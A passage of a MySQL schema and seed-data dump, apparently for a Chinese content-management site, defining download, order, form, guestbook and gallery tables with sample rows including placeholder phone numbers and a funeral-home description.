`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`page_id`),
KEY `mini_id` (`mini_id`,`lang`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信小程序diy页面表';
-- -----------------------------
-- Table structure for `ey_diyminipro_setting`
-- -----------------------------
DROP TABLE IF EXISTS `ey_diyminipro_setting`;
CREATE TABLE `ey_diyminipro_setting` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(60) NOT NULL DEFAULT '' COMMENT '页面组',
`value` text NOT NULL COMMENT '组装之后的值',
`mini_id` int(11) NOT NULL DEFAULT '0' COMMENT '小程序ID',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `type` (`name`) USING BTREE,
KEY `mini_id` (`mini_id`,`lang`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信小程序多功能配置表';
-- -----------------------------
-- Table structure for `ey_download_attr_field`
-- -----------------------------
DROP TABLE IF EXISTS `ey_download_attr_field`;
CREATE TABLE `ey_download_attr_field` (
`field_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`field_name` varchar(32) DEFAULT '' COMMENT '字段名称',
`field_title` varchar(32) DEFAULT '' COMMENT '字段标题',
`field_use` tinyint(1) DEFAULT '0' COMMENT '字段是否使用,0未使用,1为使用',
`sort_order` smallint(5) DEFAULT '0' COMMENT '排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`field_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='上传文件属性表';
-- -----------------------------
-- Records of `ey_download_attr_field`
-- -----------------------------
INSERT INTO `ey_download_attr_field` VALUES ('1', 'extract_code', '提取码', '1', '1', 'cn', '1561001807', '1561024954');
INSERT INTO `ey_download_attr_field` VALUES ('2', 'server_name', '服务器名称', '1', '2', 'cn', '1561001807', '1561078673');
-- -----------------------------
-- Table structure for `ey_download_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_download_content`;
CREATE TABLE `ey_download_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `news_id` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='资讯内容表_存储正常内容';
-- -----------------------------
-- Table structure for `ey_download_file`
-- -----------------------------
DROP TABLE IF EXISTS `ey_download_file`;
CREATE TABLE `ey_download_file` (
`file_id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '产品ID',
`title` varchar(200) DEFAULT '' COMMENT '产品标题',
`file_url` varchar(255) DEFAULT '' COMMENT '文件存储路径',
`extract_code` varchar(20) DEFAULT '' COMMENT '文件提取码',
`file_size` varchar(255) DEFAULT '' COMMENT '文件大小',
`file_ext` varchar(50) DEFAULT '' COMMENT '文件后缀名',
`file_name` varchar(200) DEFAULT '' COMMENT '文件名',
`server_name` varchar(200) DEFAULT '' COMMENT '服务器名称',
`file_mime` varchar(200) DEFAULT '' COMMENT '文件类型',
`uhash` varchar(200) DEFAULT '' COMMENT '自定义的一种加密方式,用于文件下载权限验证',
`md5file` varchar(200) DEFAULT '' COMMENT 'md5_file加密,可以检测上传/下载的文件包是否损坏',
`is_remote` tinyint(1) DEFAULT '0' COMMENT '是否远程',
`downcount` int(10) DEFAULT '0' COMMENT '下载次数',
`sort_order` smallint(5) DEFAULT '0' COMMENT '排序',
`add_time` int(10) unsigned DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`file_id`),
KEY `arcid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_download_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_download_log`;
CREATE TABLE `ey_download_log` (
`log_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`users_id` int(10) DEFAULT '0' COMMENT '用户ID',
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`file_id` int(10) DEFAULT '0' COMMENT '附件ID',
`ip` varchar(20) DEFAULT '' COMMENT 'ip',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '编辑时间',
PRIMARY KEY (`log_id`),
KEY `file_id` (`file_id`,`aid`,`users_id`) USING BTREE,
KEY `aid` (`aid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='下载记录表';
-- -----------------------------
-- Table structure for `ey_download_order`
-- -----------------------------
DROP TABLE IF EXISTS `ey_download_order`;
CREATE TABLE `ey_download_order` (
`order_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '文章订单ID',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '媒体订单编号',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`order_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '订单状态:0未付款,1已付款',
`order_amount` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '订单应付总金额',
`pay_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '支付时间',
`pay_name` varchar(20) NOT NULL DEFAULT '' COMMENT '支付方式名称',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`pay_details` text COMMENT '支付时返回的数据,以serialize序列化后存入,用于后续查询。',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '视频文档ID',
`product_name` varchar(100) DEFAULT '' COMMENT '视频文档名称',
`product_litpic` varchar(500) DEFAULT '' COMMENT '视频文档封面图片',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`order_id`),
UNIQUE KEY `order_code` (`order_code`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_email_template`
-- -----------------------------
DROP TABLE IF EXISTS `ey_email_template`;
CREATE TABLE `ey_email_template` (
`tpl_id` mediumint(8) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`tpl_title` varchar(100) DEFAULT '' COMMENT '邮件标题',
`tpl_content` text COMMENT '发送邮件内容',
`send_scene` varchar(100) DEFAULT '' COMMENT '邮件发送场景',
`add_time` int(11) DEFAULT NULL COMMENT '添加时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`tpl_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_email_template`
-- -----------------------------
INSERT INTO `ey_email_template` VALUES ('1', '您有新的邮件,请注意查收!', '<p>亲爱的会员:</p><p>${content}</p>', '1', '1509268284', '1509281095');
-- -----------------------------
-- Table structure for `ey_field_type`
-- -----------------------------
DROP TABLE IF EXISTS `ey_field_type`;
CREATE TABLE `ey_field_type` (
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '字段类型',
`title` varchar(64) NOT NULL DEFAULT '' COMMENT '中文类型名',
`ifoption` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否需要设置选项',
`sort_order` int(10) NOT NULL DEFAULT '0' COMMENT '排序',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`name`),
UNIQUE KEY `name` (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='字段类型表';
-- -----------------------------
-- Records of `ey_field_type`
-- -----------------------------
INSERT INTO `ey_field_type` VALUES ('text', '单行文本', '0', '1', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('checkbox', '多选项', '1', '5', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('multitext', '多行文本', '0', '2', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('radio', '单选项', '1', '4', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('switch', '开关', '0', '13', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('select', '下拉框', '1', '6', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('img', '单张图', '0', '10', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('int', '整数类型', '0', '7', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('datetime', '日期和时间', '0', '12', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('htmltext', 'HTML文本', '0', '3', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('imgs', '多张图', '0', '11', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('decimal', '金额类型', '0', '9', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('float', '小数类型', '0', '8', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('region', '区域类型', '1', '6', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('file', '附件类型', '0', '11', '1532485708', '1532485708');
INSERT INTO `ey_field_type` VALUES ('media', '多媒体类型', '0', '11', '1532485708', '1532485708');
-- -----------------------------
-- Table structure for `ey_form`
-- -----------------------------
DROP TABLE IF EXISTS `ey_form`;
CREATE TABLE `ey_form` (
`form_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增表单ID',
`form_name` varchar(255) NOT NULL DEFAULT '' COMMENT '表单名称',
`intro` text NOT NULL COMMENT '表单描述,预留',
`status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '表单状态,0关闭,1开启',
`attr_auto` tinyint(1) DEFAULT '0' COMMENT '自动标签:0=否,1=是',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='表单管理表';
-- -----------------------------
-- Table structure for `ey_fuwu_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_fuwu_content`;
CREATE TABLE `ey_fuwu_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Table structure for `ey_guestbook`
-- -----------------------------
DROP TABLE IF EXISTS `ey_guestbook`;
CREATE TABLE `ey_guestbook` (
`aid` int(11) NOT NULL AUTO_INCREMENT,
`form_type` tinyint(1) DEFAULT '0' COMMENT '数据分类:0=留言模型,1=自由表单',
`typeid` int(11) DEFAULT '0' COMMENT '栏目ID/表单ID',
`channel` smallint(5) DEFAULT '0' COMMENT '模型ID',
`users_id` int(11) DEFAULT '0' COMMENT '用户id',
`md5data` varchar(50) DEFAULT '' COMMENT '数据序列化之后的MD5加密,提交内容的唯一性',
`ip` varchar(255) DEFAULT '' COMMENT 'ip地址',
`is_read` tinyint(1) DEFAULT '0' COMMENT '0=未读,1=已读',
`is_star` tinyint(1) DEFAULT '0' COMMENT '标记星号',
`source` tinyint(1) DEFAULT '0' COMMENT '提交来源:1=电脑端,2=手机端',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`aid`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_guestbook_attr`
-- -----------------------------
DROP TABLE IF EXISTS `ey_guestbook_attr`;
CREATE TABLE `ey_guestbook_attr` (
`guest_attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '留言表单id自增',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '留言id',
`form_type` tinyint(1) DEFAULT '0' COMMENT '数据分类:0=留言模型,1=自由表单',
`attr_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '表单id',
`attr_value` text COMMENT '表单值',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`guest_attr_id`),
KEY `attr_id` (`attr_id`) USING BTREE,
KEY `guest_id` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8 COMMENT='留言表单属性值';
-- -----------------------------
-- Table structure for `ey_guestbook_attribute`
-- -----------------------------
DROP TABLE IF EXISTS `ey_guestbook_attribute`;
CREATE TABLE `ey_guestbook_attribute` (
`attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表单id',
`attr_name` varchar(60) DEFAULT '' COMMENT '表单名称',
`typeid` int(11) unsigned DEFAULT '0' COMMENT '栏目ID/表单ID',
`form_type` tinyint(1) DEFAULT '0' COMMENT '数据分类:0=留言模型,1=自由表单',
`attr_input_type` tinyint(1) unsigned DEFAULT '0' COMMENT ' 0=文本框,1=下拉框,2=多行文本框',
`attr_values` text COMMENT '可选值列表',
`is_showlist` tinyint(1) DEFAULT '0' COMMENT '在列表显示 0=隐藏,1=显示',
`required` tinyint(1) DEFAULT '0' COMMENT '必填 0=否,1=是',
`validate_type` smallint(5) DEFAULT '0' COMMENT '验证格式,0=不验证,1=手机,2=Email',
`real_validate` tinyint(1) unsigned DEFAULT '0' COMMENT '是否进行真实验证,0=不验证,1=真实验证',
`sort_order` int(11) unsigned DEFAULT '0' COMMENT '表单排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`is_del` tinyint(1) DEFAULT '0' COMMENT '是否已删除,0=否,1=是',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`attr_id`),
KEY `guest_id` (`typeid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='留言表单属性';
-- -----------------------------
-- Records of `ey_guestbook_attribute`
-- -----------------------------
INSERT INTO `ey_guestbook_attribute` VALUES ('1', '姓名', '7', '0', '0', '', '1', '0', '0', '0', '100', 'cn', '0', '1533612170', '1613986020');
INSERT INTO `ey_guestbook_attribute` VALUES ('2', '留言内容', '7', '0', '2', '', '1', '0', '0', '0', '100', 'cn', '0', '1533612191', '1613986020');
INSERT INTO `ey_guestbook_attribute` VALUES ('3', '手机号码', '7', '0', '0', '', '1', '0', '0', '0', '100', 'cn', '0', '1533612201', '1613986020');
-- -----------------------------
-- Table structure for `ey_guwen_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_guwen_content`;
CREATE TABLE `ey_guwen_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`diy_cyjy` varchar(200) NOT NULL DEFAULT '' COMMENT '从业经验',
`diy_cgal` varchar(200) NOT NULL DEFAULT '' COMMENT '成功案例',
`diy_dh` varchar(200) NOT NULL DEFAULT '' COMMENT '电话',
`content` longtext COMMENT '详情',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_guwen_content`
-- -----------------------------
INSERT INTO `ey_guwen_content` VALUES ('1', '101', '1622787976', '1622787976', '4', '56', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。</p>');
INSERT INTO `ey_guwen_content` VALUES ('3', '103', '1622788158', '1622788158', '5', '76', '13812345678', '<p>做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('2', '102', '1622787971', '1622787971', '3', '58', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心</p>');
INSERT INTO `ey_guwen_content` VALUES ('4', '104', '1622788475', '1622788475', '6', '67', '13812345678', '<p>生活和工作给他人展示的总是一个态度,即做事踏实和用心。</p>');
INSERT INTO `ey_guwen_content` VALUES ('5', '105', '1622788225', '1622788225', '5', '86', '13812345678', '<p>无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。</p>');
INSERT INTO `ey_guwen_content` VALUES ('6', '106', '1622788253', '1622788253', '5', '58', '13812345678', '<p>无论生活和工作给他人展示的总是一个态度。</p>');
INSERT INTO `ey_guwen_content` VALUES ('7', '107', '1622788281', '1622788281', '4', '46', '13812345678', '<p>不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('8', '108', '1622788320', '1622788320', '6', '72', '13812345678', '<p>公司经营范围为股权投资、债权投资、项目投资、资产管理、企业并购重组、投资管理及咨询和理财信息咨询。 金融作为联想控股成员企业,把为中小企业融资融智,推动实体经济发展。</p>');
INSERT INTO `ey_guwen_content` VALUES ('9', '109', '1622788354', '1622788354', '6', '113', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('10', '110', '1622788394', '1622788394', '6', '164', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('11', '111', '1622788422', '1622788422', '4', '76', '13812345678', '<p>工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('12', '112', '1622788459', '1622788459', '5', '96', '13812345678', '<p>无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节.</p>');
INSERT INTO `ey_guwen_content` VALUES ('13', '113', '1622788664', '1622788664', '6', '135', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('14', '114', '1622788722', '1622788722', '3', '76', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('15', '115', '1622788750', '1622788750', '9', '352', '13812345678', '<p>优秀的人,无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('16', '116', '1622788814', '1622788814', '5', '287', '13812345678', '<p>无论生活和工作给他人展示的总是一个态度,即做事踏实和用心。不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
INSERT INTO `ey_guwen_content` VALUES ('17', '117', '1622788851', '1622788851', '6', '276', '13812345678', '<p>不论做什么工作,都要重视小事、关注细节,把小事做细、做透,揭示了“细中见精”、“小中见大”、“伟大与平凡”的真理。</p>');
-- -----------------------------
-- Table structure for `ey_hezuo_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_hezuo_content`;
CREATE TABLE `ey_hezuo_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_hezuo_content`
-- -----------------------------
INSERT INTO `ey_hezuo_content` VALUES ('1', '66', '1599636856', '1599636856');
INSERT INTO `ey_hezuo_content` VALUES ('2', '67', '1599636870', '1599636870');
INSERT INTO `ey_hezuo_content` VALUES ('3', '68', '1599636881', '1599636881');
INSERT INTO `ey_hezuo_content` VALUES ('4', '69', '1599636893', '1599636893');
INSERT INTO `ey_hezuo_content` VALUES ('5', '70', '1599636904', '1599636904');
INSERT INTO `ey_hezuo_content` VALUES ('6', '71', '1599636918', '1599636918');
INSERT INTO `ey_hezuo_content` VALUES ('7', '72', '1599636930', '1599636930');
INSERT INTO `ey_hezuo_content` VALUES ('8', '73', '1599636943', '1599636943');
-- -----------------------------
-- Table structure for `ey_hooks`
-- -----------------------------
DROP TABLE IF EXISTS `ey_hooks`;
CREATE TABLE `ey_hooks` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键',
`name` varchar(50) NOT NULL DEFAULT '' COMMENT '钩子名称',
`description` text COMMENT '描述',
`module` varchar(50) DEFAULT '' COMMENT '钩子挂载的插件',
`status` tinyint(1) unsigned DEFAULT '1' COMMENT '状态:0=无效,1=有效',
`add_time` int(10) DEFAULT NULL,
`update_time` int(10) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `name` (`name`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_images17_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_images17_content`;
CREATE TABLE `ey_images17_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`imgurls` text COMMENT '图片集合|10001',
`content` longtext COMMENT '图集内容',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_images17_content`
-- -----------------------------
INSERT INTO `ey_images17_content` VALUES ('1', '1', '1636426759', '1636426759', 'a:2:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01A107.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01A112.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
INSERT INTO `ey_images17_content` VALUES ('2', '2', '1636426759', '1636426759', 'a:4:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01G441.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01G443.jpg\";s:5:\"intro\";s:0:\"\";}i:2;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01G445.jpg\";s:5:\"intro\";s:0:\"\";}i:3;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01G447.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
INSERT INTO `ey_images17_content` VALUES ('3', '3', '1636426759', '1636426759', 'a:2:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01H912.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01H914.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
INSERT INTO `ey_images17_content` VALUES ('4', '4', '1636426759', '1636426759', 'a:2:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I011.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I013.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
INSERT INTO `ey_images17_content` VALUES ('5', '5', '1636426759', '1636426759', 'a:2:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I059.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I101.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
INSERT INTO `ey_images17_content` VALUES ('6', '6', '1636426759', '1636426759', 'a:2:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I206.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200730/1-200I01I208.jpg\";s:5:\"intro\";s:0:\"\";}}', '');
-- -----------------------------
-- Table structure for `ey_images18_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_images18_content`;
CREATE TABLE `ey_images18_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`imgurls` text COMMENT '图片集合|10001',
`content` longtext COMMENT '图集内容',
`dizhi` varchar(251) NOT NULL DEFAULT '' COMMENT '地址',
`jingdu` varchar(251) NOT NULL DEFAULT '' COMMENT '地图经度',
`weidu` varchar(251) NOT NULL DEFAULT '' COMMENT '地图维度',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_images18_content`
-- -----------------------------
INSERT INTO `ey_images18_content` VALUES ('1', '18', '1637133079', '1637133079', 'a:4:{i:0;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031Q134.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031Q135.jpg\";s:5:\"intro\";s:0:\"\";}i:2;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031Q136.jpg\";s:5:\"intro\";s:0:\"\";}i:3;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031Q138.jpg\";s:5:\"intro\";s:0:\"\";}}', '<p>\r\n 北京市八宝山殡仪馆是全市规模最大、设施齐全的殡仪服务单位,承担着本市城近郊区市民、已故党和国家领导人、海外侨胞、国际友人的殡仪服务业务。每年承办告别活动6000余场,接待来宾近百万人次,年火化量2万多具。本馆坚持&ldquo;服务第一,丧家至上&rdquo;的宗旨,不断推行科学管理,提高服务质量,受到社会好评,连续多次被评为&ldquo;首都精神文明单位&rdquo;、&ldquo;全国殡葬改革先进单位&rdquo;、&ldquo;北京市花园市单位&rdquo;,2004年被国家民政部评为全国民政基层行风建设先进集体。</p>\r\n<p>\r\n 八宝山殡仪馆始建于1958年,是北京历史上较早的殡仪馆之一。多年来,几经大规模建设改造,已经形成一整套独特的建设风格和服务体系,&ldquo;八宝山&rdquo;因此而成为中国殡葬业的代名词。</p>\r\n<p>\r\n 服务标准:殡仪服务人员要统一着装,仪表端庄,语言文明,挂牌服务;各岗位职责明确,规范服务;遵守职业道德,拒收馈赠,杜绝索取财物。执行国家物价部门规定的收费标准。</p>\r\n<p>\r\n 1、&ldquo;一条龙&rdquo;车辆调度室服务员:使用文明用语,服务态度热情,耐心解答询问,准确叮嘱家属等车时间、地点、注意事项。</p>\r\n<p>\r\n 2、灵车司机:服从调度室安排,准时到达接运遗体地点;文明驾驶,保证车辆平稳不颠簸,转弯和过路口时照顾家属车辆,不甩车。</p>\r\n<p>\r\n 3、引导服务员(接尸工):接运遗体轻抬轻放;尊重亡者,脱穿衣文明;主动服务,满足要求;排忧解难,耐心周到。</p>\r\n<p>\r\n 4、整容工:一般整容化妆着色均匀、自然、神态安祥、衣着整齐。特殊整容力求恢复原貌达到亡者家属满意。</p>\r\n<p>\r\n 5、告别室服务员:尊重家属要求,协助布置会场;提供必要服务。</p>\r\n<p>\r\n 6、火化工:遵守操作规程,保证骨灰质量。</p>\r\n<p>\r\n 